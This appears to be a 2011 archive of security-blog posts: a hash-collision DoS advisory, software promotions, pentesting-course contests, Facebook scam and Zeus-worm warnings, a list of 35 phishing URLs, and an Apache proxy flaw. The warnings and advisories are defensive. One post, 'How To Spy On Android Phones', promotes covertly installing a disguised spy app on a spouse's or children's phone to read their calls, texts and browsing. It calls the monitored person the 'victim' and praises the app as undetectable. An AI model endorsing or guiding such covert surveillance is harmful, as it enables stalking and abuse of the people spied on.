Hash tables are a commonly used data structure in most programming languages," they explained. "Web application servers or platforms commonly parse attacker-controlled POST form data into hash tables automatically, so that they can be accessed by application developers. If the language does not provide a randomized hash function or the application server does not recognize attacks using multi-collisions, an attacker can degenerate the hash table by sending lots of colliding keys.

The algorithmic complexity of inserting n elements into the table then goes to O(n**2), making it possible to exhaust hours of CPU time using a single HTTP request."

Demonstration

The researchers have also posted a video demonstration as a proof of the vulnerability.

Countermeasures

Mircosoft has also provided the workaround for the asp.net vulnerability, You can find it here.

PHP advises to limit the number of different http request parameters. For this purpose PHP has added a max_input_vars function which gives the flexibility to limit the number of paramters.

Furthur Resources:

If you would like to learn more about the vulnerability, here are some useful links:

http://www.ocert.org/advisories/ocert-2011-003.html
http://permalink.gmane.org/gmane.comp.security.full-disclosure/83694

Download Free Android Security Software Avast Antivirus

2011-12-25T05:58:00.000-08:00

There is absolutely no doubt that Avast is one of the most famous Antivirus vendor, well known for it's amazing features. Due to recent rise in malware attacks on Android, Lots of different Antivirus have moved their attention towards developing security mechanisms for Android. Same is the case with Avast. Avast has recently launched a Android Antivirus which you can easily use for free.

Description According To AVAST:

Full-featured Antivirus and Anti-Theft security for your Android phone.

Protect personal data with automatic virus scans and infected-URL alerts. Stop hackers by adding a firewall (rooted phones). Control anti-theft features with remote SMS commands for: history wipe, phone lock, siren activation, GPS tracking, audio monitoring, and many other useful tools. Your ‘invisible’ app hides itself, making it extremely hard for thieves to find and disable.

A standalone yet tightly integrated component of avast! Mobile Security, avast! Anti-Theft is the slyest component on the market. Formerly known as Theft Aware, the Anti-Theft portion of avast! Mobile Security has been recommended by leading industry experts that include T-Mobile, N-TV, AndroidPIT, and Android Police.

Performs on-demand scans of all installed apps and memory card content, as well as on-access scans of apps upon first execution. Options for scheduling scans, virus definition updates, uninstalling apps, deleting files, or reporting a false-positive to our virus lab.

Privacy Report

Scans and displays (grid) access rights and intents of installed apps, identifying potential privacy risks, so you know how much info you are really providing to each app.

SMS/Call Filtering

Filter calls and/or messages from contact list using set parameters based on day(s) of the week, start time, and end time. Blocked calls redirect to voicemail, while blocked messages are stored via filter log. Also possible to block outgoing calls.

App Manager

Similar to Windows Task Manager, it shows a list of running apps and their size (MB), CPU load, used memory, and number of threads and services – with an option to stop or uninstall.

Web Shield
Part of the avast! WebRep cloud, the avast! Web Shield for Android scans each URL that loads and warns you if the browser loads a malware-infected URL.

Firewall

Add a firewall to stop hackers. Disable an app’s internet access when on WiFi and 3G and roaming mobile networks. (Works only on rooted phones.)
avast! Anti-Theft

App Disguiser

After downloading avast! Anti-Theft, user can choose a custom name that disguises the app (e.g. call it “Pinocchio game”) so that it is even harder for thieves to find and remove.

Stealth Mode

Once anti-theft is enabled, the app icon is hidden in the app tray, leaving no audio or other trace on the target phone – the app is ‘invisible’, making it difficult for thieves to detect or remove.

Self-Protection

Extremely difficult for thieves to remove (especially on rooted phones), Anti-Theft protects itself from uninstall by disguising its components with various self-preservation techniques. On rooted phones it is able to survive hard-resets and can even disable the phone’s USB port.

Battery Save

Anti-Theft only launches itself and runs when it needs to perform tasks. This preserves battery life and makes it very difficult for thieves to shut it down.

SIM-Card-Change Notification

If stolen and a different (unauthorized) SIM card inserted, the phone can lock, activate siren, and send you notification (to remote device) of the phone’s new number and geo-location.

Trusted SIM Cards List

Establish a ‘white list’ of approved SIM cards that can be used in the phone without triggering a theft alert. You can also easily clear the trusted SIM cards list, to leave the one present in the phone as the only trusted one.

Remote Settings Change

A setup wizard guides the user through the installation process on rooted phones. No command-line knowledge is necessary to install Anti-Theft rooted. Also supports upgrading.
Remote Features

SMS commands provide you the following REMOTE options for your ‘lost’ (or stolen) phone:
Siren, Lock, custom Display properties, Locate, Memory Wipe, covert Calling, Forwarding, “Lost” Notification, SMS Sending, History, Restart, and more.

Video

Download Free Android Security Software Avast Antivirus here

December 2011 Contest Sponsor For RHA - elearnSecurity

2011-12-19T11:10:00.000-08:00

Contest Closed - Winners Announced here

Due to a tremendous response of readers and huge number of participants of the last contest "Vote for RHA and Win Facebook Hacking Course", we decided to setup another contest for RHA readers. We have partnered with ElearnSecurity.net and arranged a contest for our readers, The winners will be handed over with prizes worth up to 1400$.

Rewards

Before we inform you about the Contest participation details, We would like you to know about the rewards and prizes which the winners will get their hands On.

[1ST PRIZE] Pentesting Pro Course [Worth 600$]

Pentesting PRO course is developed for ones who have some knowledge related to Ethical hacking and Penetration testing but would like to take their knowledge to the next level. In order to understand what's inside the Pentesting PRO course, I have conducted a short interview with the lead Instructor Mr.Armando.

What's the main difference b/w The Student Course And PRO Course?

The Student course has been created for someone completely new to penetration testing. We bring the student on basics on both aspects. The Student course aims at making the student comfortable with the Penetration testing process, its methodologies, from Information gathering to exploitation and teaching how to use the most important tools. Last but not least, I don't think there's another course with a more enjoyable learning experience than our course for beginners.

The Professional course is for someone with an experience in information security and un understanding of what penetration testing is. It's an extremely in depth course with a 100% hands on certification at the end. This course has been authored by three instructors and covers three sections: System Security, Network Security and Web application security.

For each of these sections the students will learn the most modern techniques professional penetration testers use to audit and exploit a local or a remote network.

You and me both know that, Pentesting In real world is far more difficult, Does your course provides the students to tackle in the realworld situations?.

Definitely. To get your eCPPT certification you not only have to perform areal penetration test, but you also have to produce a commercial grade report. We teach how to create an excellent report that speaks to the different levels of the client organization.

This is what happens in the real world and we tried to bring the real world into a certification exam, with great results so far.

What if some one has Zero knowledge related to Ethical hacking and Penetration testing?

Everyone at some point has zero knowledge on something. We don't claim to make anyone the no.1 hacker in the world by enrolling in our courses. However I know that this is the hardest job in the world and only a few manage to get a job in this field.

What you will need is perseverance, curiosity and a proven learning path.We can't do much about the first two but I can tell we provide great material and proven learning path.This minimizes the struggle that any beginner faces during early times and drastically increases the chances for him to succeed.In fact we have a big success rate among our beginners.

What could be the maximum level that a Student Achieve After completing both of Your Courses?

We have had students finding a job as Junior pentesters or advancing theircareers as Senior pentesters. Moreover with our labs, the students feels empowered with readily usable skills that can use in the everyday job.This is life changing in some way.

[2ND PRIZE] Pentesting Beginners Course Student [Worth 400$]

We have already discussed about the Elearnsecurity student course in our previous post Elearn Security Beginners Course For Penetration Testers.

[3RD PRIZE] Pentesting Labs [RANDOM] [Worth 400$]

The winner will get 30 days access to the VPN labs. You will thrown into a real world environment where you can practice what you learned in the Penetration testing PRO course.

Discount

Every one participating in the contest will get 5% off on every thing he purchases from elearnsecurity before the 31st december.

How To Participate?

Here is how you can particapte in the contest:

1. First of all you need to like our page http://facebook.com/rafayhackingarticles

2. Next you need to share this page with your friends on Facebook, Twitter, Digg, Delicious, yahoo groups, facebook groups, like page etc.

3. Lastly you would need to post a comment telling us briefly "Why Do You think, you Should Be The One Who Should Be Choosen As A Winner"

How To Win?

[First Prize] The person with the most number of shares and the most impressive answer to the above question will win the first prize of penetration testing pro course.

[Second Prize] The person with the second most number of shares and an impressive answer to the question will win
Note: The answer carries more weight than your shares, which means that if you have the most shares and not a very impressive answer, You may move to the second and third position.

[Third Prize]The third prize will be chosen via a lucky draw,

Here is an example:

Hello my name is "ABC", My email address is abc@gmail.com, I have liked your page and have shared this post on following places:

My Facebook Profile : http://facebook.com/risepk
My FanPage Profile with 1,437 fans : http://facebook.com/risepks
My Google + Profile : http://gplus.to/risepk
My Tumblr BLog : http://risepk.tumblr.com
My Twitter Profile having 557 followers : http://twitter.com/risepk
My Linked in Profile : http://pk.linkedin.com/in/risepk
My Stumble Profile : http://www.stumbleupon.com/stumbler/risepk/all/
My Digg Profile : http://digg.com/faizmuhammadkhan
My Delicious profile : http://www.delicious.com/risepk

I would like to be choosen as a winner because <Your Answer>

When will the winners be announced?

The winners will probably announced some where b/w 2nd January 2012 and 5th January 2012. We would like to wish every one best of luck.

How To Spy On Android Phones – Spy That Phone App Review [Android]

2011-12-16T11:50:00.000-08:00

You might get caught in many situations where you have to break in to the privacy of your family member like Kid or Wife just to make sure, nothing is wrong with their life & eventually yours too ! Wheather it is an doubt about your son/daughter getting with wrong group of friends or about your girlfriend or wife having affair or whatsoever reason, you might want to spy in to their phones.

There is an amazing Android App I would like to share which keeps your stress away by spying the smartphone of your wife and kids to make sure you are happy in life – Spy That Phone.

Spy That Phone is an android app that is not just easy to install on mobile phone of victim but also to access their personal data like – calls, sms, web history and calender events.

All you have to do is install the spy app on mobile phone of your kids or wife and app will start giving you all data on web account.

How Does Mobile Spy App – ‘Spy That Phone’ Works ?

Its pretty simple, let me explain step by step.

1. Download & Install the app on persons phone who you wish to spy on to. ( Make sure it is an Android smartphone.)

2. You’ll get information about logging in to web interface. Just use your login ID & password and you are in to your control panel, where you can see all the spied information.

3. Now You can Check all Call logs with details on timing, number, call duration etc.

4. All SMS content with full details.

5. Web Search History & So on…

Benefits of using Spy That Phone App

1. The App is hevaily disguised & it is highly impossible to get detected by victim or by any program. There are no traces left on smartphone at all.

2. App is very stable & No force close or any errors that goes suspicious due to app. You can trust 100% on its stability.

3. Logs are stored on could. So you don’t have to store it somewhere on your PC or mobile. You can get access to all logs anytime & anywhere with the help of internet connection.

4. Support for app is world class, you can ask as many questions & get a personal help from support team and developer themselves. All issues will be sorted our in record time & you do not have to worry about technical difficulties.

5. Cost is lowest as possible – You can compare this app cost with any other spy mobile apps in the market right now, They have made it available at lowest cost with better quality & efficiency.

I have used this app personally & trust me there is no better spy mobile app that will manage all your worries about wife and kids at such a low investment.

Click here to visit the website of Spy That Phone Android App

Beware! Facebook Scam "Yeahh!! It happens on Live Television!"

2011-12-13T07:48:00.000-08:00

we recently covered about a facebook worm which targeted a whole lot of facebook users. It's really sad to see that these types of scams keep growing and facebook hasn't really been able to successfully give protection to their users from such scams.

A new bloke in the list "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like a wildfire among facebook users.

The following status on one of my friend's wall bought my attention first towards this scam:

Yeahh!! It happens on Live Television![LINK]

Lol Checkout this video its very embracing moment for her

The lady is the above screen shot is Marika Fruscio an Italian Model, She had Wardrobe malfunction (Accidental exposure of intimate parts) on a live TV show, which is what the scam refers to.

On clicking the link, Facebook users are directed to the folllowing page:

In order to play the video the user has to click the button "jaa", which appears as an age verification system required in order to watch the video. when you click on "jaa" you are infact clicking on a hidden link which consequently post the same link on each of your contact's wall. Next a survey is prompted which the user needs fill in order to watch the video, thus helping the scammers make tons of money.

While searching related to the scam on the internet, I managed to find the source code of the scam on pastebin, This proves that there is not a single body behind this scam, with the source code available in public, any one could create a website and inject the malicious javascript in to it and start scamming.

http://pastebin.com/8y4X2hxj

One more thing to note is that in most such cases blogspot blogs are being targeted as they are free to create, You can create a blog in less than 5 minutes. If this keeps growing, I believe that blogger will stop giving free blogspot blogs and will maybe switch to a payed system or facebook would just disable blogspot domains from being shared, thus making it difficult for real bloggers to market their blogs.

How To Remove The Scam?

It's fairly easy to remove the scam, all you need to do is to report it to facebook.

Download Free Video Converter Hamster

2011-12-08T05:44:00.000-08:00

Every day I get questions asked related to recommendations for free video converters. However due to increase in number of Paid Video converters, People deeply confuse whether to go with a paid one of a free one. The answer is that if there are tons of video converters available for free, why should we go for a paid one. One of those free video converters is my favorite Hamster.

Hamster Free Video Converter is a new video converter that turns video conversions into fun. It supports 3GP, MP4, MP3, MPEG, AVI, FLV, WMV, XviD, DivX, MKV, M2TS and etc (40+). Now you may easily convert video for any DVD player, iPod, iPhone, iPad, Archos, Zune, PSP, PS3, xBox, iRiver, HTC, Blackberry or Nokia in 3 clicks (supports 200+ devices)

Download Free Video Converter Hamster here

Elearn Security Beginners Course For Penetration Testers

2011-12-02T06:32:00.000-08:00

There are thousands and thousands of people who want to become a penetration testers and Ethical hackers but most of them become after spending some time researching these topics get frustrated and quit, And I don't blame them for being frustrated as there is no proper information and guidance available on the internet and if there is some it is presented in the wrong way to the beginners.

When I started got interested in this field at the age of "14", there were no proper information available on the internet, Most of them were not available for Intermediates and were mostly targeted towards those who already have prior knowledge of Hacking and Penetration testing.
All the stuff I learned was by trial and error, Experimenting and experimenting and experimenting, As I reason of which went I managed to understand the inns and outs of this field, I wrote a book "A beginners Guide To Ethical Hacking" for beginners only, but it was more focused towards Ethical hacking rather then penetration testing.

Now a days Penetration testing is getting more focused and has got much more hype then Ethical hacking due to the tremendous amount of job opportunities. As a result of which there are several hundred's of people offering online training's to the newbie's. Recently I came across a wonderful course "Penetration testing - Student" by Elearnsecurity, The content outline was enough to impress me. So I contacted the CEO "Mr. Armando", I told him that your course is something which my readers would be really interested in. So therefore today I am reviewing "Penetration testing - Student" course by Elearn Academy. People note that the review is fully unbiased and is based on my personal opinion.

Editors Overall Rating: 8/10
Presentation: 9/10
Content: 8/10

Course:

The whole course is comprised of 647 slides and the course is divided in to two main sections:

1. Preliminary Section
2. Penetration Testing

Preliminary Section:

The preliminary section is for absolute beginners, who have very little or no knowledge related to Ethical hacking and Penetration testing, The Preliminary section is furthur more divided in to two sections.

1. Networking

2. Webapplication

Networking:

I have stressed lots of times in my previous articles related to the importance of networking, because in order to understand Layer 3 attacks i.e Network based attacks, You need to understand how networks work?. You need to understand how the network infrastructure is setup. Before understanding how to compromise the networks.

The second of section talks about the basics of webapplication security and attacks. Since past 3 or 4 years, The attacks have been more directed towards webapplication more than networks, And it makes sense, Because networks are more difficult to compromise than Webapplication themselves. The section talks about basics of HTTP protocol, which is the foundation of the webapplication, The instructor also talks about Cookies, Sessions and same origin policy which is really essential for understanding attacks like XSS (Cross Site Scripting) and Session Hijacking.

I believe that the Instructor has did a very great job in explaining the preliminary section, However I would have liked more if the instructor would have gone in much more depth of networking section.

Penetration Testing Section:

Penetration testing section talks about the methodology of penetration testing more than the tools of Penetration testing, The section talks about both Network based penetration testing and Webapplication based penetration testing, But the instructor did not go in to much depth as I was expecting. The section talks about several attacks webapplication attacks such as XSS, SQL Injection and buffer overflow. However the section did not talk about other high risk vulnerabilities like LFI, RFI, Directory transversals etc.

Labs:

For the Beginner course, eLearnSecurity provides two Labs solutions. The first is included in the package and is based on Metasploitable distro. Students are guided through the set-up of the lab environment and will be able test acquired skill on this freely available vulnerable virtual machine.

The second option is to add Coliseum Lab to the package. This is an online virtual lab on web application security where the student is give 14 different real world scenarios and valuable educational material during the lab. This further 100% hands on module costs $99 for 30 days access.

Presentation:

The thing which I liked the most about the course is the presentation, The slides were presented in a superb way combined with flash based videos and other useful material. At the end of every topic there was a small quiz, which helped you test how much you have understood from the section.

Overall

Overall the course was excellent for beginners and is highly recommended, It's not recommended for intermediates or those who have prior knowledge of Penetration testing.

Cost:

The whole course costs about $349. Which is a very reasonable price as compared to other security related training companies. You can enroll your self for 7 days risk free trial, So if at the end of the day, You feel that this is not for me, They will refund your every single penny. You can enroll your self by clicking at the link mentioned below:

Click Here To Visit The Official Page For More Information

Winners Announced!

2011-12-01T12:07:00.000-08:00

It's finally time to announce winners for My "Facebook Hacking Course", First of all I would like to thank all the people who participated in the contest, I received more entries then I expected, most of them were on our Facebook Fan Page and on the comments section. We also received some private entries from people who were not interested in revealing their email addresses through the comments section.

As mentioned before in the contest declaration article, that I would be only giving two copies of my new Facebook hacking course.

Here are the lucky winners:

Winners With Most Shares:

1. Danial

Randomly Selected Winner:

2. Sarwan Baloch.

So guys, take some time to congratulate contest Winners. If you're one of them, hearty congratulations to you. If you're not one of them, don't worry, there are many more contests to come

Beware! New Picture Worm Hits Facebook Today

2011-12-01T06:14:00.000-08:00

From last few months, Facebook has been widely targeted for scam and spreading malware, One of the those spreading worm I discovered recently was when I was chatting with my friend, The following message from the sudden appeared.

hehehI!!! lool http://tinyurl.com/Wooo-2841-jpg

From the above screenshot, you can clearly see that tinyurl has been used to shorten the URL, One more thing to note is that it's not an image file as image files end with .JPG extension then -jpg.

The above screenshot describes a more clear picture of what you are going to download along with the JPG file. The exe is basically a Zeus Trojan, Zeus is one of the most popular botnets used for stealing sensitive information such as passwords, credit card numbers. One of it's popular feature is an Anti VM and Anti Sandbox capability, Making it useless for testing it inside virtual environments.

A scan at Virus total shows that only 3/18 URL scanners were able to detect it as a malware site, Rest of them failed.

Kindly spread the news by sharing it with your friends and people you know, So they should not fall for the malware.

French Facebook Phishing Scam Steals More Than 5000 Facebook Accounts

2011-11-28T13:47:00.000-08:00

In my previous post "Facebook Phishing At It's Best" I wrote about recent facebook related phishing scam stealing thousands of facebook accounts, However every time I come across a phishing site, I try to find the password file which saves the entered passwords, I was able to obtain the passwords txt file, However what surprised me most that a french facebook phishing site had more than 5000 entered usernames and passwords.

Here is the exposed password file with over 5000 passwords:

I am screening through the password files of rest of the phishing pages, I will update you once I find some more of them.

Facebook Phishing Scams At It's Best

2011-11-28T13:34:00.000-08:00

Phishing as discussed before is one of the most widely used method to hack a facebook account, Phishing holds the top position in an article I wrote on 10 Ways How Hackers Can Hack Your Facebook Account In 2011. There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

In a recent research by security-web center, A collection of 35 phishing sites have been made public, below mentioned are the 35 different phishing websites found by security-webcenter.

Note: Please Don’t Try to login on listed websites.

http://www.sanagustinturismo.co/Facebook/

http://www.facebook.pcriot.com/login.php

http://deadlyplayerx.binhoster.com/Facebook/securelogin.php
http://facelook.shop.co/login.php

http://sigininto.horizon-host.com/facbook/facebook.php

http://custom-facebook.info/facebook.htm

http://www.profile.co.gp/facebook/photo.phpfbid=12447510&set=a.478812.I41224&type=1&theater.html

http://s6.mywibes.com/facebook.htm
http://www.fjtech.us/

http://myoneid.site90.com/
http://facedook.co.gp/wwwfacebookcomprofilephpid100001548737188.htm

http://faceebook-com.bugs3.com/login/Secured_Re-login/index1.html

http://facebooook.axfree.com/

http://combatarms.free.fr/

http://sweed.web44.net/

http://thekshitij.in/facebook/index1.html

http://addgames.awardspace.biz/

http://www.profile.co.gp/facebook/

http://www.sjscheat.com/Hosting%20blogger/facebook

http://h1.ripway.com/denal/

http://1337r00t.13.ohost.de/r00tw00tkn00wn/

http://faacebok.zapto.org/

http://h4ck3rgadungan.adfoo.info/index1.html

http://www.2498.b.hostable.me/
___________________________________
+ Updated (28.11.2011):
http://www.facebook.reekcreations.com/

http://wvw.facebook.com-photos.php.id.1574348425.jgold.in/

http://fan-pages.vgig.ir/facebook.com.home.php.sk-2361831622.applicationspage/

http://timkoch71.net46.net/1638765386283/facebook/

http://privacy-facebook-it.f11.us/check_privacy.htm

http://www.configsetting.com/facebook/login.htm

http://facebook-beta.kilu.de/facebooklogin.html

http://www.frfacebook.fr/

http://fun4iran.tk/facebook.unfiltered/Index.htm

http://login.eu.nu/facebook/photo.phpfbid=1248427590010&set=a.1292457490730.34590.1809072438&type=1&theater.html

How Do People Fall For These Link?

LAST WARNING : Your account is reported to have violated the policies that are considered annoying or insulting Facebook users. Until we system will disable your account within 24 hours if you do not do the reconfirmation.

Please confirm your account below:

[Link Removed]

Thanks.

The Facebook Team

Copyright facebook © 2011 Inc. All rights reserved.
At this point of time you might be wondering, how do users fall for these kind of scams, How are they redirected to these phishing pages. Now there are lots of ways how attackers do it, However Here is an example of a recent facebook account delete scam.

The victim is sent the above message from a random email address which appears to be something like facebookprivacy@gmail.com, account_delete_facebook@gmail.com, while looking at these email address the victims feels that the email is from a legitimate source.

Unpatched Apache Flaw Allows The Attacker To Access Protected Directories

2011-11-27T07:19:00.000-08:00

Security researcher Prutha Parikh discovers yet another reverse proxy vulnerability with Apache, The vulnerability was discovered as she was trying to write the signature for the older CVE-2011-4317 vulnerability. According to the security researcher an attacker can manage to access the internal network if the vulnerability is successful exploited.

How It Works?

An attacker can make use of a crafted http request to bypass the security mechanism and exploit a fully patched version of Apache and can allow the attacker to access the internal network is reverse proxy rules are not properly configured.

Proof Of Concept:

The security researcher has demonstrated a POC at Qualys website here.